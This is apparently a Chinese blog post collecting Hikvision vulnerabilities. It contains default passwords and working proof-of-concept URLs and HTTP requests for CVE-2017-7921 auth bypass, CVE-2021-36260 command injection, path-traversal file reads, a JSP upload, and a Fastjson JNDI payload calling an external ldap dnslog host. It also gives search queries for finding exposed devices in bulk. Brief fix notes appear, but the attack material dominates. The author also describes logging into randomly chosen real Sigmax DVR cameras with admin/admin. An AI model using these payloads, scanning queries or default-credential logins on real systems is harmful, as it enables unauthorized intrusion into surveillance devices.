1、海康威视系列产品默认口令

海康威视综合安防管理平台  admin  Abc123++

海康威视群组对讲服务配置平台  admin  12345

海康威视联网网关  admin  12345

海康威视 流媒体  admin  12345

hikvision (ssh)  admin  12345

Haivision Makito X Decoder (web)  admin  manager

2、海康威视配置文件解码-CVE-2017-7921

排查范围：

产品类型  影响版本

DS-2CD2x20(B/C/D)、DS-2CD3x20(B/C/D)   V5.3.1 build150417-V5.4.23 build161020

DS-2CD3x10(C)   V5.4.0 build160415-V5.4.4 build161105

DS-2CD4x2xFWD   V5.2.0 build140721-V5.4.20 build160714

DS-2CD5x   V5.3.2 build150515-V5.4.4 build161022

DS-2CD2xx5、DS-2CD3xx5   V5.3.1 build150410-V5.3.3 build150613   V5.3.5 build150906-V5.4.23 build161020

DS-2DEx、DS-2DFxV5.3.1 build150527-V5.4.4 build160927

排查手段：

查看系统所有存在用户列表

http://ip/Security/users?auth=YWRtaW46MTEKYWRtaW46MTEK

auth内容是admin:11的base64编码。

2023-06-20T00:33:27.png

获取系统监控快照，不需要进行身份验证。

http://ip/onvif-http/snapshot?auth=YWRtaW46MTEK

2023-06-20T00:34:06.png
下载摄像机配置文件，通过脚本解密配置文件获得账密信息。

http://ip/System/configurationFile?auth=YWRtaW46MTEK

2023-06-20T00:35:08.png

解密命令

python3 decrypt_configurationFile.py configurationFile
github链接：https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor

红框中的就是后台登陆的账号密码。

2023-06-20T00:35:46.png

修复方式：

目前海康威视官方已发布新版本修复该漏洞，请受影响用户尽快更新进行防护。

下载链接
https://www.hikvision.com/cn/support/CybersecurityCenter/SecurityNotices/20170314/

3、命令注入漏洞-CVE-2021-36260

排查范围：

易受攻击的网络摄像机固件。

产品类型   影响版本

IPC_E0   IPC_E0_CN_STD_5.4.6_180112

IPC_E1   未知

IPC_E2   IPC_E2_EN_STD_5.5.52_180620

IPC_E4   未知

IPC_E6   IPCK_E6_EN_STD_5.5.100_200226

IPC_E7   IPCK_E7_EN_STD_5.5.120_200604

IPC_G3   IPC_G3_EN_STD_5.5.160_210416

IPC_G5   IPC_G5_EN_STD_5.5.113_210317

IPC_H1   IPC_H1_EN_STD_5.4.61_181204

IPC_H5   IPCP_H5_EN_STD_5.5.85_201120

IPC_H8   Factory installed firmware mid 2021

IPC_R2   IPC_R2_EN_STD_V5.4.81_180203

排查手段：

漏洞Poc：

PUT /SDK/webLanguage HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 89
<?xml version="1.0"
encoding="UTF-8"?><language>$(ifconfig -a >
webLib/dd.asp)</language>

成功执行命令。
2023-06-20T01:07:27.png
2023-06-20T01:07:35.png

修复方式：

目前海康威视官方已发布新版本修复该漏洞，请受影响用户尽快更新进行防护。

下载链接：
https://www.hikvision.com/cn/support/CybersecurityCenter/SecurityNotices/20210919/

4、任意文件读取漏洞-CNVD-2021-14544

排查范围：

流媒体管理服务器 V2.3.5。

2023-06-20T01:08:34.png

排查手段：

漏洞Poc：

访问如下Url下载 system.ini文件。
http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini

2023-06-20T01:09:16.png
修复方式：

对用户输入的参数进行校验；限定用户访问的文件范围；使用白名单；过滤…/；防止用户进行目录遍历；文件映射，存储和应用分离。

5、任意文件上传漏洞

排查范围：

iVMS-8700综合安防

2023-06-20T01:09:56.png

排查手段：

漏洞Poc：


POST /eps/api/resourceOperations/upload?token=构造的token值 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: ISMS_8700_Sessionname=A29E70BEA1FDA82E2CF0805C3A389988
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo
Upgrade-Insecure-Requests: 1
Content-Length: 174

------WebKitFormBoundaryGEJwiloiPo
Content-Disposition: form-data; name="fileUploader";filename="1.jsp"
Content-Type: image/jpeg

test
------WebKitFormBoundaryGEJwiloiPo

2023-06-20T01:10:21.png

token处的内容是：url+secretKeyIbuilding 的大写32位MD5值

2023-06-20T01:10:31.png

批量检测

hunter：web.body="/views/home/file/installPackage.rar"
github链接：https://github.com/sccmdaveli/hikvision-poc

2023-06-20T01:10:56.png

这里源地址脚本或许有点问题，手工验证没有一个存在的。后面小改了一下脚本，3个号1500分，硬是一个没跑出来，可能是洞出来太久都修了。

2023-06-20T01:11:07.png

修复方式：

修改拼接方式，增加白名单校验。

6、Fastjson远程命令执行漏洞

排查范围：

海康威视综合安防管理平台。
2023-06-20T01:11:31.png

排查手段：

漏洞Poc：


POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0)
Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Host: 127.0.0.1
Accept-Language:
zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
Content-Length: 196

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.dnslog.cn","autoCommit":true},"hfe4zyyzldp":"="}

复现这个漏洞的时候也是全网各种找案例，只可惜也是一个没找到，时间还花了一大把，只能用大佬现成的图顶一下。

拿burp自带的dnslog探测。

2023-06-20T01:12:08.png

成功接收到回显。

2023-06-20T01:12:22.png

修复方式：

目前厂商已发布升级补丁以修复漏洞。

补丁获取链接：
https://github.com/kekingcn/kkFileView/issues/304

Sigmax DVR 摄像头

这个是搜索摄像头资产的时候无意发现的，资产主要分布在美丽国。

hunter：title="Sigmax DVR"

2023-06-20T01:13:22.png

80%资产都是弱口令admin/admin，随机从1页中挑3个登录。

2023-06-20T01:13:33.png

2023-06-20T01:13:40.png

2023-06-20T01:13:48.png

海康威视常见漏洞收集

1、海康威视系列产品默认口令

2、海康威视配置文件解码-CVE-2017-7921

4、任意文件读取漏洞-CNVD-2021-14544

5、任意文件上传漏洞

6、Fastjson远程命令执行漏洞

Sigmax DVR 摄像头

评论 (4)